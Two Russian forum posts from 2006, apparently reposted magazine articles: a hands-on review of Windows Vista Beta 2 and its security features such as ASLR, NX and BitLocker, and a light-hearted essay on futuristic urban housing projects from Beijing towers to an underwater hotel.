Автор: Metallica Nov 20 2006, 00:17

Windows Vista — гроза хакеру

Обзор возможностей бета-версии ОС нового поколения

Итак, свершилось. Бета-версия новой Windows Vista официально доступна на сайте Microsoft. А значит, вооружившись скальпелем и недюжинным желанием, можно прощупать эту операционку со всех сторон. Что мы, собственно, и сделали. Вот результат.

Ты — избранный

До сегодняшнего дня познакомиться с новой ОС могли только самые любопытные и терпеливые, которых не испугать поиском варезных релизов в пиринговых сетях. Теперь все иначе. На выставке WinHEC 2006, которая, между прочим, является одним из ведущих событий организуемых Microsoft, глава компании лично заявил, что вторая бета-версия Windows Vista будет доступна для тестирования широкому кругу лиц. И не соврал. С 7 июня любой желающий имеет возможность слить вторую бету Висты (билд 5384 от 16.05.2006) бесплатно. Причем не какую-то урезанную версию, а самую что ни на есть полную — Ultimate Edition, включающую в себя все возможные компоненты будущей ОС. Мало этого, сразу в двух вариациях: для 32- и 64-битных платформ. Немного непривычным в сравнении с другими релизами MS может показаться размер дистрибутивов: 3,3 Гб и 4,2 Гб для разных вариаций. Но ведь это же ось нового поколения, в которой Microsoft аккумулирует все свои наработки за последние несколько лет. Да и вообще тебя не должно это волновать: образ с новой операционкой ты найдешь на нашем DVD.

Огласите требования.

Завладев дистрибутивом, одни сразу ринуться в бой, а другие задумаются: «А потянет ли моя машина?». Гейтс сильно преувеличил, когда в конце 2003-го года рассказывал о компьютере нового поколения для новой ОС. Как это обычно бывает, погорячились, а потом исправились. Чуть позже были оглашены новые системные требования, которые по нынешним меркам вполне скромные: процессор не меньше 1,1 Гц, 512 Мб оперативной памяти и современная видеокарта. В этот раз разработчики не поленились классифицировать максимально возможное разрешение для каждого класса видюшек: если у тебя видеокарта с 64 Мб памяти на борту, то большего разрешения, чем 1440х900, ты не увидишь, 128 потянет на 1920х1200 и т.д. Впрочем, даже эти характеристики указаны с некоторым запасом надежности. Например, у меня дома Vista вполне успешно завелась на стареньком 800-м Атлончике с 256 Мб оперативы. Да и бесхитростный GeForce2 200MX потянул намного больше, чем обещали разработчики. Для полноценной работы этого, естественно, недостаточно, но при большом желании для экспериментов полнее подходит.

Трудности перевода

Как и в предыдущих версиях винды, существует два варианта для установки: можно воспользоваться загрузчиком с DVD или же инсталлить ось из-под существующей системы. И если в последнем случае ничего кардинально не изменилось, то мастер для установки системы с нуля был переписан подчистую. Теперь это полноценная графическая система с удобным и понятным интерфейсом и подробными комментариями, сопровождающими любой шаг пользователя. Вообще проблемы, по-моему, исключены. Единственная сложность — дождаться, пока мастер сделает все необходимые действия. На моем тормозном домашнем компе вся процедура длилась аж полтора часа, хотя в офисе мы установили систему не более чем за 30 минут.

Работа с только что установленной операционкой обычно начинается с инсталляции необходимых драйверов. Но в случае Windows Vista я не устанавливал ни единого драйвера (в ХР такого не было). Все завелось и заработало на стандартных дровах, причем без каких-либо действий с моей стороны. И это несмотря на то, что сразу после выхода первых версий Longhorn’а (прежнего названия будущей ОС) по всемирной паутине понеслись жесткие дискуссии по поводу отвратной совместимости Windows Vista с существующим оборудованием и программным обеспечением. Мол, после установки в диспетчере — целый перечень конфликтующих устройств, а звуковые девайсы в Windows Vista вообще отказываются работать. Ни за что не поверю, что в дистрибутиве размером в 3,5 Гб не найдется укромного уголка для самых необходимых драйверов, с учетом того, что даже в XP, с ее сравнительно смехотворным объемом дистрибутива, помещалась все, что нужно. Не верь и ты. smile.gif

Что касается программной совместимости, то здесь вполне могли возникнуть проблемы. Переход на другую ОС, тем более с новым ядром, всегда влечет за собой неработоспособность отдельных приложений. И все же у меня почти все приложения заработали вполне стабильно. Неприятным исключением, правда, оказалась Miranda, которая по непонятным причинам глючила, но это, похоже, исключительно локальные проблемы на моем компьютере. Замечу, что определенные конфликты с приложениями могут возникнуть в связи с использованием новой графической среды Aero, поскольку некоторые программы с ней попросту несовместимы. Но в этом случае Vista автоматически переключит оформление на стандартное (с которым не возникнет подобных проблем), а затем, когда работа с приложением закончится, вернет все настройки оформления на свои места. Вообще, по нашим наблюдениям, с каждой новой сборкой заметно оттачивается стабильность системы. Если ранние версии можно было установить исключительно ради интереса — поэкспериментировать и удалить, то вторую бету Vista уже вполне можно использовать в качестве основной системы. Что я успешно и делаю на протяжении двух последних недель.

Красиво жить не запретишь

Если в твоем распоряжении имеется видеокарта с памятью на 128 Мб, то тебе будет доступна одна из главных инноваций Windows Vista — графическая технология Aero Glass. Эта потрясающая штука предоставляет совершенно новый интерфейс с трехмерными изображениями и кардинально новыми возможностями визуализации. Без тени сомнения могу сказать, что Aero на голову выше обычного интерфейса GDI+, используемого ранее в XP: многие моменты, ранее препятствующие комфортной работе, исправлены. Все реально продумано до мелочей. Навигация между окнами, например, стала намного проще благодаря предварительному просмотру окошек, появляющихся как при переключении через Alt-Tab, так и при наведении на иконку окна в панели задач. Причем в погоне за наворотами и впечатляющими эффектами, Microsoft задумалась и о стабильности системы. В случае нехватки ресурсов из-за большого количества запущенных приложений Windows предложит пользователю на время отключить требовательный интерфейс и таким образом существенно увеличить общее быстродействие Vista. Пользователю предоставляется три альтернативных варианта оформления, унаследованный у XP: Vista Basic, Standart из 2000 и старый добрый Classic от 98 винды.

Вся графическая часть системы построена на специально разработанной подсистеме Windows Presentation Foundation (кодовое название — Avalon). Использование векторного подхода и новейших технологий позволяет унифицировать работу с пользовательским интерфейсом, 2D- и 3D-изображениями, векторной и растровой графикой, анимацией, аудио и видео. В результате пользователю предлагаются свободно масштабируемые окна с тенями, полупрозрачными рамками, а также плавными переходами при максимизации или минимизации окна и т.д. И что самое главное — все это работает быстро, без тормозов.

В лучшую сторону изменилось меню «Пуск». Благодаря специальному полю, позволяющему находить нужную программу по части ее названия, не придется больше бегать по экрану глазами и судорожно искать нужное приложение. Впрочем, даже обычная навигация стала на порядок удобнее за счет использования древовидной структуры, аналогичной той, что применяется в проводнике.

Функции быстрого поиска доступны и на более глобальном уровне — по всей системе сразу. В частности, это одно из главных нововведений нового шелла системы, позволяющее быстро находить нужные документы. Если ранее использовалось понятие папки исключительно как контейнер для хранения файлов, то в Windows Vista введено новой понятие — список. В новый объект могут виртуально входить самые различные документы, которые реально имеют любое другое месторасположение. Кроме этого, доступен так называемый теневой каталог, позволяющий по запросу пользователя вернуть его содержание к состоянию, сохраненному в одной из точек восстановления. Наконец-то в систему встроен полноценный инструмент для бэкапа документов и отличный планировщик заданий, которые вполне успешно можно использовать. Все это стало доступно за счет введения символических ссылок и технологии Transactional NTFS — надстройки над существующей файловой системой NTFS, поддерживающей механизм транзакций. Напомню, что транзакция — это неделимая последовательность операций, которая может завершиться успешно (с выполнением всех запланированных действий), или завершиться полной неудачей (с откатом операций, которые завершились успешно).

Хочу отметить такой элемент интерфейса, как Windows SideBar. Несмотря на то, что в последних билдах он по умолчанию отключен, о нем знает почти каждая функциональная панель. Появившаяся еще в первых билдах Longhorn, она моментально заинтересовала публику и попала во всевозможные статьи. По умолчанию панель имеет довольно скромные возможности, но это сделано преднамеренно. Функциональность серьезно наращивается путем добавления/удаления так называемых гаджетов — небольших приложений со своими настройками и функциями (что-то вроде плагинов). Они свободно перемещаются по десктопу и могут выполнять самые разнообразные функции, например, отображая прогноз погоды или качество сетевого соединения. Гаджеты представляют собой не что иное, как HTML-файл, содержащий в себе код на VBScript или JavaScript. Любой человек, владеющий базовыми знаниями этих языков, может разработать свой собственный плагин, и успешно использовать его, разместив в папке %userprofile %\appdata\local\microsoft\windows sidebar\gadgets.

Мультимедиа

Окно для настройки клавиатуры претерпело значительные изменения. Теперь помимо выбора раскладок клавиатуры (расположение клавиш, между прочим, можно просмотреть в отдельном окошке) можно указать язык для голосового ввода теста. Да-да, информацию не обязательно вводить вручную — достаточно воспользоваться системой распознавания речи. Штука поистине потрясающая! После небольшого обучающего тура система начнет записывать тест под диктовку идеально, а если даже и сомневается в каком-то слове, то выдает пронумерованный список возможных вариантов — от тебя лишь потребуется сказать номер правильного слова. Управлять системой через микрофон — одно удовольствие. Единственный минус — это отсутствие поддержки русского языка. Но ведь в релизе этот недостаток исправят…

Порадовала новая панель для управления звуком. Наконец-то в винде реализована возможность изменения громкости как для всей системы, так и для каждого приложения в отдельности. А вместо убогой программы для записи звука теперь интегрирована полноценная утилита, которая не в пример предшественницы может записывать сразу в формат WMA и не ограничивает запись по времени.

DirectX 10, разработанный специально для Vista, включает в себя столько нового, что всей статьи не хватит, чтобы пробежаться по этим инновациям. Правда, обещанное в 6 раз увеличение производительности мы сможем ощутить лишь в приложениях и девайсах, адаптированных под новую версию графического API. Сейчас же остается задуматься о режиме совместимости со старыми версиями DirectX, а также приложениями, их использующих. Такая совместимость, естественно, предусмотрена, но на деле показала себя не с лучшей стороны: некоторые современные игрушки работать под Vist’ой отказались.

Не буду тебя парить по поводу нового мультимедийного центра от Microsoft. Едва ли тебя удивишь возможностью просмотра DVD-дисков и т.д.

Сеть

С сетью у пользователей часто возникают различные проблемы. То интернет не работает, то браузинг тормозит. Честь и хвала парням из Microsoft, которые создали универсальный инструмент, готовый решить большинство потенциальных проблем обычных пользователей. Специально разработанный мастер в Network Center не только руководит настройкой сети, но и автоматически пытается настроить подключения к инету, а также исправить некорректные настройки сетевых подключений. Для домашних локалок с одним-единственным шлюзом в инет — это настоящая панацея от всех бед.

В сетевом центре всегда отображается схематическая карта топологии сети с ключевыми элементами (компьютер, шлюз, интернет и т.д.), а также обозначенными связями между ними. Если что-то не работает, то пользователь в большинстве случаев наглядно увидит, где именно произошла неполадка. Владельцам ноутбуков должна приглядеться поддержка сетевых профилей, позволяющая для каждой локалки обозначить IP-адрес, DNS и прокси-серверы, а также любые другие настройки, после чего быстро переключаться между ними. Особое внимание уделено именно беспроводным подключениям. В настройках даже можно указать адрес в формате IPv6 (это благодаря тому, что Vista полноценно поддерживает следующую версию протокола Internet Protocol (IP)). Ранее эта поддержка была частичной, и указать настройки можно было исключительно с помощью консольных команд.

Не могу не рассказать о новом Internet Explorer’е. Похоже, ребята из MS наконец-то решили сделать из ослика настоящий браузер. По крайней мере, результат работы на лицо: поддержка многовладочного режима, встроенный инструмент для чтения RSS-лент, блокировщик всплывающих окон и множество инструментов для защиты от всевозможной гадости. Зачет.

Безопасность

Microsoft обещает, что безопасность и надежность станут двумя важнейшими характеристиками, благодаря которым пользователи захотят приобрести Windows Vista. Действительно, парни приложили массу усилий, чтобы новая ось стала крепкой и здоровой. Например, сразу после установки, учетные записи пользователей ограничиваются в использовании Internet Exlorer. Полномочий хватает на просмотр исключительно веб-страничек. А сам IE запускается отдельным процессом с низкими привилегиями, тем самым ограждая пользователя от вредоносного контента и уявимостей, в том числе и ActiveX-компонентов. Все попытки провести атаку через IE, по идеи, закончатся неудачами, поскольку сам браузер будет обладать минимальными правами в системе.

Следующий пункт очень важен. Разработчики реализовали «человеческий» брандмауэр в Висте с фильтрованием как входящего, так и исходящего трафика. Консоль MMC, через которую реализовано управление файрволом, предоставляет больше возможностей по сравнению с ранним интерфейсом. Что особенно радует, так это то, что файрвол позволяет задать исключения для каждого отдельного пользователя, а также создать несколько профилей с настройками для разных сетей. Офигенная вещь с поддержкой IPv6, установкой шифрования трафика посредством IPSec- и Kerberos-аутентификации для заданных подключений. Спасти от такой заразы, как spy-модули, может еще и Windows Defender. Вкупе с файрволом прога непрерывно следит за теми областями системы, где обычно прописывает себя всевозможная зараза, и нейтрализует ее в случае обнаружения.

Еще одной функцией для обеспечения безопасности системы является технология Windows Service Hardening (повышение стойкости служб), которая предотвращает попытки сервисов несанкционированно выполнять операции с файловой системой, реестром и сетевыми настройками. Каждому сервису отныне присваивается идентификатор безопасности (Security identifier, SID), с помощью которого возможно не только разграничить внешний доступ самой службы, но и саму ее оградить от внешнего воздействия. Важно заметить, что большинство служб теперь запускаются не с системными привилегиями, а с помощью менее привилегированных аккаунтов, таких как Local Service или Network Service.

Для защиты конфиденциальной информации в Vista встроена технология BitLocker Drive Encryption, предназначенная для шифрования данных на системном разделе. Систему рекомендуется использовать совместно со специальным чипом Trusted Platform Module (TPM), в котором хранятся ключи для дешифрования информации. Однако возможна также аутентификация с помощью пароля или файла-ключа, расположенного на USB-флешке. Правда, активировать шифрования оказалось очень и очень непросто — в итоге помогла справка.

Всевозможные виды атак и, в первую очередь, переполнение буфера осуществить в Vista станет существенно сложнее из-за технологии случайного размещения кода в адресном пространстве (ASLR, Address Space Layout Randomization). Каждый раз при включении компьютера системой будут случайным образом меняться адреса начальных ячеек памяти с наиболее часто используемыми системными библиотеками. И если раньше разработанный для винды эксплоит отлично работал в аналогичной системе на другом компьютере, то технология ASLR эту возможность значительно затруднила. Подобный принцип уже давно реализован в системе OpenBSD.

Vista — эта первая операционная система в семействе Windows с полноценной поддержкой специального бита NX (No-Execute), присущего современным процессорам. С его помощью можно обозначить участки памяти, в которых расположены инструкции программы (то есть код) или же сегмента данных, которые ни в коем случае не подлежат выполнению. Этот принцип предотвращает использование ошибок, приводящих к выполнению произвольного кода.

Резюмирую. Хакерам, похоже, придется изрядно поломать голову, чтобы обойти все защитные уловки системы. Инжектировать и выполнять произвольный код будет уже не такой простой задачей, как раньше. Но ведь это даже интересней smile.gif.

Logout

Само собой, в рамках одной статьи невозможно рассказать о том огромном количестве нововведений, которые представлены в Windows Vista. Но мы попытались дать обзор самых сочных фишек, которые реально пригодятся тебе в деле. В любом случае, ты имеешь отличную возможность протестировать новую ось и определиться в том, что тебе действительно нужно.

DVD

На нашем DVD ты найдешь полную 32-битную версию Windows Vista Beta 2, а также Microsoft Office 2007 Beta 2.

INFO

У новой операционной системы, в отличие от Windows XP, будет не две, а сразу несколько комплектаций. Самая простая — Windows Vista Home Basic — будет стоить порядка 1000 рублей.

WWW

www.microsoft.com/rus/windowsvista — официальный сайт Windows Vista

www.microsoftgadgets.com — ресурс, посвященный гаджетам Windows SideBar

www.thevista.ru — русскоязычный проект о новой ОС Microsoft

www.winline.ru — отличный сайт по ОС семейства Windows

INFO

В переводе на русский язык vista означает «новые возможности», «открывающиеся перспективы». Парни из маркетингового отдела с названием ОС не прогадали: оно получилось звучным и запоминающимся.

Чего мы не дождемся.

Релиз Windows Vista запланирован на 1 января 2007 года, и в оставшиеся месяцы Microsoft, скорее всего, сконцентрирует усилия на поиске недочетов и багов. Едва ли в финальном релизе будут какие-либо изменения, поэтому можно смело огласить список тех вещей, которые в Vist'е не будут включены по умолчанию, хотя когда-то обещались.

* WinFS (Windows Future Storage) — новейшая система, построенная на тесной интеграции существующей NTFS и SQL Server 2005. Подобная связка позволит использовать поисковые запросы на интуитивном языке, типа «Показать все эксплоиты за 2006 год, использующие Buffer Overflow error», и практически мгновенно получить доступ к нужным файлам.

* Новый командный интерпретатор Windows PowerShell (кодовое название — Monad), о котором ты можешь прочитать в отдельной статье этого номера, также не будет включен в состав Vista из-за накладок в ходе разработки.

* PC-to-PC Sync — пиринговая технология для синхронизации каталогов на нескольких машинах. Удалена из системы, так как не отвечала требованиям качества. В будущем она может быть представлена как отдельное приложение.

Новые консольные утилиты

mklink — создает, модифицирует и удаляет символические ссылки. Да-да, теперь обращаться к файлам и директориям можно не только напрямую, но и с помощью виртуальной ссылки. Полный аналог симлинков из юникса.

bcdedit — прога для управления загрузчиком (конфигурационный файл boot.ini, в котором раньше располагались параметры загрузчика, больше не используется)

robocopy — расширенная утилита для копирования файлов и директорий

transaction — команда для использования возможностей Transactional NTFS




Автор: Metallica Nov 20 2006, 08:22

Квартирный вопрос

Где и как будут жить люди в будущем, в условиях жесткого демографического кризиса

ЭПИГРАФ

«…Обыкновенные люди... в общем, напоминают прежних... квартирный вопрос только испортил их...»

М.А. Булгаков, «Мастер и Маргарита»

Массовая культура сильно влияет как на тебя в частности, так и на человечество вообще. Так влияет, что иногда довольно простая проблема, если ее вынести на суд общественности, вызывает поток неординарных и противоречивых решений. И в первую очередь это касается обсуждения и проектирования городов настоящего и ближайшего будущего.

Вот представь себе: живешь ты спокойно со своей девчонкой в однокомнатной квартире. Тут приезжает твой брательник-трудоголик и просит пожить у тебя месяц. Он, к примеру, крэйзи-электронщик, и целыми днями что-то паяет и дымит на весь флэт, на улицу его не выгонишь (считай, интим пропал), а выгнать вообще (по крайней мере, до обещанного срока) как-то неудобно. Твоя благоверная помешана на всякой мелкой и крупной живности: жучки, кошечки, цветочки. Все подоконники в квартире заняты под рассаду. Но ей этого мало, и рассадник постепенно переползает в комнату. Ты же любишь посидеть за компом, иногда посмотреть ящик и т.д., и т.п. Но через недельку замечаешь, что даже эти простые удовольствия у тебя отняли: брательник занимает стол своим хламом, постоянно стряхивая горячее олово и канифоль на подружкину рассаду. Подружка не лыком шита – переходит в ванную и там устраивает гидропарк. Ты срочно переоборудуешь балкон под конспиративную квартиру, чтобы хоть там спокойно посидеть с пивом. Но не тут-то было! Как раз к завершению твоих трудов по утеплению, застеклению и проведению на балкон оптоволокна приезжает вдруг твоя бабушка, которой надо постоянно что-то солить, мариновать и закатывать, и твой стратегический балкон ей идеально подходит в роли погреба, а оптоволокно – для подвязки помидоров. Подружкина рассада идет на засолку, брательник уже пятый раз перепаивает блок питания в твоем компе, приговаривая: «Ну, сейчас точно работать будет…». И через месяц, давясь бабкиными консервами с оптоволокном, рассадой и канифолью, ты понимаешь, как прекрасна жизнь.

Примерно такая же ситуация развивается вокруг глобального квартирного вопроса на нашем глобусе. Возникла довольно щекотливая ситуация: что делать и как жить, когда нас будет гораздо больше, чем сегодня. Земля-то не резиновая, следовательно, надо либо уходить под воду, либо зарываться в недра и там строить подземные пещеры, либо же вообще жить на воздушных замках. А можно продолжить благородные начинания небоскребостроителей и сделать из всей планеты один большой город.

То, что места всем не хватит, еще в XVIII веке открыл Томас Мальтус, основатель теории популяции. Он утверждал, что численность населения будет расти до тех пор, пока не столкнется с ограниченным предложением продуктов питания. Он заявил, что население растет в геометрической прогрессии, а предложение продуктов питания - в арифметической.

Следовательно, войны и эпидемии не только опасны и вредны, но и полезны, так как помогают регулировать количество народа на земном шаре.

Однако те слои прогрессивного человечества, которые в детстве читали Льва Толстого и Махатму Ганди, с этим не согласны – все жить хотят, поэтому лучше жить плохо и в тесноте, чем вообще никак. Опять-таки массовая культура.

Пришвин научил нас любить природу, поэтому прессоваться в каменные цитадели небоскребов нам не хочется. В довершение А.П.Чехов научил нас любить все прекрасное.

Как известно, самые испорченные культурой люди – творческие личности, к которым, естественно, относятся архитекторы. Поэтому результаты их работы по решению глобального квартирного вопроса довольно противоречивы, хотя и интересны.

Наращивание мускулов

Самый простой (правда, не технически) представленный способ решения демографической проблемы – полное освоение планеты и превращение всей ее жилой площади в стадо небоскребов. Сторонники классического небоскребостроения всеми силами стараются обеспечить нам с тобой безоблачное будущее. В прямом смысле этого слова. Во всяком случае, рядовой житель будущего Пекина практически не будет видеть неба. Это удовольствие будет доступно только богатым буратинам, которые будут проживать на самом верху километровых небоскребов-труб. Перестройка Пекина Beijing Boom Tower (BBT) к 2020-му году сейчас обсуждается, разрабатывается проект, и трубный вариант кажется самым подходящим для такого плотнонаселенного города.

Кроме простой перепланировки Пекина, проектирование супермегаполиса преследует другую цель: правительство Китая хочет узнать, как запихнуть как можно больше китайцев на квадратный метр площади и что они при этом будут чувствовать? Короче говоря – глобальный эксперимент. И Китай с его населением – идеальная для этого платформа.

Занимается этим группа архитекторов, инженеров и художников из нескольких стран, объединившихся в фонд "Динамичный город" (Dynamic City Foundation), со штаб-квартирой в Пекине.

На площади 0,06 квадратного километра ВВТ умещается 5 тысяч квартир, не считая многочисленных офисов, магазинов и иных общественных зон. Это возможно благодаря сети 60-этажных небоскребов-труб, которые сужаются кверху (для того чтобы к их основанию хоть когда-то попадал солнечный свет). BBT — это попытка переосмыслить город, создать среду, где будут парящие площади и небоскребы, сливающиеся у оснований, где транспорт обретет настоящую трехмерную свободу.

Кусочек такого Пекина архитекторы смоделировали на макете. А чтобы все могли почувствовать себя муравьями в муравейнике, разместили в разных точках макета миниатюрные камеры, транслирующие на большие экраны вид города глазами его жителей.

Результаты не воодушевляют. Можешь посмотреть сам. Жители нижних ярусов будут видеть синее небо и облака только в снах. Но зато этот город чертовски функционален. Транспортные магистрали простираются не только внизу, но и связывают на разных уровнях небоскребы-трубы. Буратины могут сразу же въехать к себе домой на машине по подземному путепроводу, связанному с нужным ярусом трубы-небоскреба. Жителям нижних ярусов будет тоже удобно: подземка доставит их непосредственно к основанию нужной трубы. Пешеходы и велосипедисты путешествуют внизу, среди череды рынков и лотков с едой. На втором уровне — "подземка".

Третий – путепроводы для машин, которые будут пронизывать небоскребы почти на всех уровнях, так что ты сможешь проехать из одной трубы в другую напрямую, через связывающие их галереи.

По совету канадских архитекторов, планируется создание еще одной, четвертой, магистрали движения – гигантской сети воздушных труб для велосипедистов – Velo-City.

Это такая связка труб, практически висящих в воздухе, по которым ты едешь на велосипеде, невзирая на погодные условия, не видя автомобилей, не страдая от загрязнений и прочих вещей.

Трубы будут сделаны главным образом из стекла, поэтому это будет похоже на поездку через длинный атриум. Задуманы три полосы движения, точно так же, как на шоссе: для медленной, умеренной и быстрой езды. Каждая труба имеет два направления движения, отделенных друг от друга. Это разделение снижает сопротивление воздуха и создает естественный попутный ветер. Таким образом, эффективность езды возрастает примерно до 90% — велосипедисты смогут ездить быстрее, развивая скорость до 50 км/час. Стеклянные трубы можно установить где угодно: нет никаких выхлопов, никакого шума и никакого вреда центру города они не причинят. Выезды из этих труб в самых разных ключевых точках много места не займут.

При таком раскладе богатые обитатели "верха" не будут нуждаться в визитах в сумеречный "низ". А обитатели "дна" никогда не поднимутся к свету. Фантасты нам такое уже рисовали.

Город-сад

Другой, более дружелюбный, но нестандартный подход заключается в объединении небоскребов и природы. Первыми об этом заговорили японцы, которые не мыслят свою жизнь без всякой икебаны. Они предложили строить небоскребы, в которых на каждом ярусе находится мини-сад с прудом или другая рекреационная зона. Короче говоря, новый проект можно будет смело назвать висячими садами Семирамиды ХХI века.

Занимается разработкой «зеленых проектов» компания Takenaka. Одно из ее предложений – зеленый город-небоскреб Sky City 1000. Высота Sky City составляет 1 километр при диаметре у основания 400 метров и вверху - 160 метров.

Все этажи башни сгруппированы в 14 блоков по 14 этажей. Каждый блок представляет собой вогнутую чашу, на "дне" которой расположена зеленая зона с живыми деревьями и не менее "живыми" прудами.

Между блоками имеются значительные просветы. Они выполняют двойную функцию: обеспечивают доступ воздуха к паркам города, а также играют роль противопожарных перегородок. Днище и стены каждого блока выполнены из огнеупорных материалов. Естественное освещение и открытый воздух создают комфортную среду обитания для 36-ти тысяч жителей. Многие из них здесь же и будут работать. Кроме того, в город каждый день будут приезжать 100 тысяч рабочих и служащих. И, естественно, туристы.

Общая обитаемая площадь Sky City составляет 800 гектаров, что вполне соответствует небольшому городку. При этом на парки и дороги приходится 240 гектаров — больше четверти общей площади
Учитывая то, что небоскребы и тотальная урбанизация – зло неизбежное, японский вариант более привлекателен, чем китайские трубы. Таких же человеколюбивых взглядов придерживаются и корейские урбанисты-архитекторы.

В 2015-2017-х годах завершится строительство самого высокотехнологичного города на Земле – Нью-Сонгдо (New Songdo City). Самое интересное состоит в том, что весь город полностью спроектировали с нуля и с нуля же и начали строить. Фактически это первая попытка в истории человечества спроектировать и построить с нуля целый город. Займет он площадь в 5,57 квадратных километра. Строительство обойдется в $25 миллиардов. А жить в нем постоянно будут 500 тысяч человек. Расположится Нью-Сонгдо в 64 километрах от Сеула, на берегу моря. Он будет частично стоять на воде, как Венеция. Собственно, его уже и называют азиатской Венецией XXI века.

Южнокорейские политики и бизнесмены намерены превратить Нью-Сонгдо в один из самых мощных деловых центров Азии, подобно тому, как столетие назад Венеция была одним из торговых центров Европы.

Кроме красоты, зелени, приятной обстановки и отсутствия километровых муравейников, в этой бочке меда плавает капелька того, о чем ты подумал.

Большой Брат

Знаешь, зачем составляли проект высокотехнологичного города Нью-Сонгдо? Все очень просто: для того, чтобы следить за всеми его жителями. Все строения связаны в локальную сеть, которой управляет суперкомпьютер, обрабатывающий все данные о состоянии домов и передвижении жителей. Если ты пенсионер и тебе вдруг поплохело, ты вырубился и упал – сверхчувствительный пол сразу же даст сигнал медицинскому компьютеру дома, тот сканирует микросенсоры, находящиеся в твоей одежде, и, если ты действительно так плох, вызывает через суперкомпьютер неотложку. Правда, непонятно, что такая система будет делать, если ты далеко не старпер и просто решил развлечься на полу с подружкой?

И это только цветочки. Всем жителям дают карточки-идентификаторы (паспорт, бумажник, права, ключ от квартиры и машины в одном лице). Естественно, на карточке будет RFID-метка и ряд других кодов, что позволит следить за тобой, хотя проектанты говорят, что этого делать никто не собирается (поверили мы им, как же).

Постройка корейского города Нью-Сонгдо задумывается не только как продажа недвижимости оптом строительными компаниями. Это еще и большой эксперимент, который покажет, трудно ли жить в обществе, где на тебя стучит даже твой сортир. Чтобы народ все-таки захотел жить в этом городе, архитекторы спланировали очень удобный и красивый план застройки. В нем будут не только международные школы, больницы, аптеки и музей, но и разветвленная сеть каналов ("Венеция-XXI" же). Вдобавок разные вкусности: океанариум, поле для гольфа, кафе, магазины, парк, множество офисных центров и несколько гостиниц.

Естественно, первым делом город оккупируют всяческие любители взлома wink.gif. Надеюсь, мы еще услышим о сетевых баталиях по взлому гостиниц, снятию наличности и т.д. Об этом мы узнаем довольно скоро: первая фаза строительства (центр города) должна быть завершена в 2008-м году, а полностью Нью-Сонгдо будет возведен в 2014-2015-х годах. Некоторым проектантам мало и тотального контроля. Им нужно тотальное подчинение. Например, как часто ты бываешь в супермаркете? Удобно затариться по полной программе и недельку не отвлекаться от любимых занятий. А слабо переехать туда жить?

Вот, к примеру, суммарная площадь американских супермаркетов Wal-Mart занимает ....

Вот некоторые архитекторы и хотят использовать пустующее место на крышах этих торговых монстров. Не пропадать же добру! Идея проста: на первом этаже делаем супермаркет, а на втором – строим дома и, вообще, возводим обычный город. Этот монстр назвали Waltropolis’ом – от названия супермаркета Wal-Mart и, вообще, название города по-гречески – polis.

Только чтобы ты понял, что ничего хорошего в этом не предвиделся, я представлю тебе немного проектной статистики. Габариты здания: 11 километров на 1,6 километра при высоте 90 метров. 10 уровней для всех сторон жизни: от торговли до образования. Постоянное население – 100 тысяч человек. 18 квадратных километров крыши Waltropolis должны быть покрыты живописной россыпью отдельных коттеджей, стоящих среди зеленых насаждений и парковых дорожек – в точности, как привыкла "одноэтажная" Америка.

Скрытые внизу автостоянки рассчитаны на 2,5 автомобиля на каждую семью горожан. Вдоль фасада мегаздания идет шоссе (это, кстати, одна из ключевых магистралей между Штатами. На таких трассах и предполагается строить эти города), с которых есть въезды на стоянки и, вообще, на разные уровни сооружения. Многочисленные грузовики, доставляющие в город все необходимое для жизни, разгружаются снаружи: по краю здания расположены специальные площадки (в несколько уровней). С них товары поднимаются на нужные этажи по разветвленной системе конвейеров, продолжающихся и глубоко внутри здания. Создается впечатление, что это скорее один огромный комбинат, занятый поддержанием своей инфраструктуры, чем жилище для людей.

Тут не только тотальный контроль, тут еще попахивает ограничением свободы выбора: попробуй купить что-то, выходящее за номенклатуру Waltropolis! Неудивительно, что продвижение этого проекта выгодно в первую очередь крупным финансовым магнатам, которые постоянно ведут войну за рынок сбыта. А тут весь рынок сбыта охвачен и подчинен полностью одной торговой структурой.

Вспоминая Жюля Верна

Возвращаемся к массовой культуре. Наверное, все, кто читал в детстве Жюля Верна – в основном подводные приключения капитана Немо, – мечтал хотя бы некоторое время пожить именно так.

Надо сказать, что часть людей, по профессии сталкивающаяся с работой на глубине, давно прочувствовала на себе «прелести» подводной жизни: кислородное голодание, авитаминоз, кессонная болезнь. Но вообще проблему жизни под водой всерьез никто не ставил, так как на «мелководных» станциях все более-менее в порядке, а на глубоководных – единицы, и дешевле выплатить компенсацию за профзаболевание жителю, чем реструктурировать подводную базу целиком. Для туриста же подводные путешествия – золотое дно. Поэтому двое ученых-исследователей захотели нажиться на благородном стремлении к дайвингу у населения. Приобщить массы к жизни под водой оказалось проще пареной репы: берется старая исследовательская лаборатория и переоборудуется под гостиницу. Все довольны: и туристы, и хозяева гостиницы.

Поселиться и пожить несколько дней под водой можно уже сегодня. "Подводный Домик Жюля" (Jules Undersea Lodge) расположился на глубине примерно 6,5 метров у берега Флориды, в живописном местечке Key Largo, где подводная обстановка богата разнообразнейшей флорой и фауной.

А сравнительно недалеко от Jules находится единственная в мире действующая подводная обитаемая лаборатория Aquarius (Jules когда-то тоже был научно-исследовательской станцией).

Пусть в Jules - всего две спальни, но это пока единственное место на планете, где можно за деньги снять номер под водой и провести в нем сколь угодно много времени, совершая вылазки в подводный мир. Длина подводного домика равна 15,24 метра, ширина — 6,1 метра, а высота — 3,35 метра.

Вход в отель — это открытый кусочек пола (мини-бассейн). Сам Домик стоит на ножках, и между дном и его полом есть просвет. Давление воздуха в отеле повышенное, точно соответствующее глубине, потому вода не поднимается дальше.

Добираться до отеля нужно в акваланге. Кстати, номер тебе дадут только в том случае, если покажешь сертификат дайвера. Выходы наружу можно совершать сколько угодно раз (декомпрессии-то потом не требуется). И вовсе без акваланга, кстати. Людям, гуляющим по дну, воздух подают из отеля по 30-метровому шлангу. Кроме изумительной природы, гости отеля могут полюбоваться искусно воссозданным "испанским галеоном", намеренно затопленным тут хозяевами отеля, и попрактиковаться в подводной археологии. Но главное — это 107-сантиметровый иллюминатор напротив кровати, мимо которого проплывают рыбки. Однако пожить под водой – удовольствие не из дешевых. Ночь в Домике стоит $395 с человека. Но, несмотря на столь высокие цены, заказывать номер надо за несколько месяцев – он никогда не пустует.

